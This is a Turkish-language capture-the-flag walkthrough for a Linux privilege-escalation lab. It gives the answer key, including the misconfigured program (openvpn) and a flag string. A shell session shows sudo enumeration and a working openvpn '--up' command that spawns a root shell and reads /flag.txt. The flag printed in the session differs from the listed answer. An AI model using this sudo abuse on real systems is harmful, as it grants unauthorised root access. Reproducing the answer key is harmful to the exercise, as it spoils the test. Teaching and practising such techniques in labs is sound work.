# Privilege Escalation 5 Sudo Rights


**Açıklama**:

Yanlış konfigüre edilmiş sudo izinleri olan uygulamayı bularak sistemi ele geçirin ve yetki yükseltin.

**Amaç**:

- Yetki Yükseltmek
- /flag.txt'i okumak

**Flags**:
- Yanlış konfigüre edilmiş uygulama?
    - answer: **openvpn**
- flag.txt?
    - answer: **CyberPath{N6V9ENMf2GGdWw5M}**

## **Solution**:

```bash
victim@ubuntu:~$ uname -a
Linux ubuntu 5.13.0-1022-aws #24~20.04.1-Ubuntu SMP Thu Apr 7 22:10:15 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
victim@ubuntu:~$ id   
uid=1000(victim) gid=1000(victim) groups=1000(victim)
victim@ubuntu:~$ ls -la
total 20
drwxr-xr-x 2 victim victim 4096 May  4 11:06 .
drwxr-xr-x 1 root   root   4096 May  4 11:06 ..
-rw-r--r-- 1 victim victim  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 victim victim 3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 victim victim  807 Feb 25  2020 .profile
victim@ubuntu:~$ sudo -V
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
victim@ubuntu:~$ sudo -l
Matching Defaults entries for victim on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User victim may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/sbin/openvpn
victim@ubuntu:~$ which openvpn
/usr/sbin/openvpn
victim@ubuntu:~$ 
victim@ubuntu:~$ 
victim@ubuntu:~$ sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh'
Wed May  4 11:08:00 2022 disabling NCP mode (--ncp-disable) because not in P2MP client or server mode
Wed May  4 11:08:00 2022 OpenVPN 2.4.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Mar 22 2022
Wed May  4 11:08:00 2022 library versions: OpenSSL 1.1.1f  31 Mar 2020, LZO 2.10
Wed May  4 11:08:00 2022 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Wed May  4 11:08:00 2022 ******* WARNING *******: All encryption and authentication features disabled -- All data will be tunnelled as clear text and will not be protected against man-in-the-middle changes. PLEASE DO RECONSIDER THIS CONFIGURATION!
Wed May  4 11:08:00 2022 /bin/sh -c sh null 1500 1500   init
# whoami
root
# cat /flag.txt
CyberPath{flag}
#
```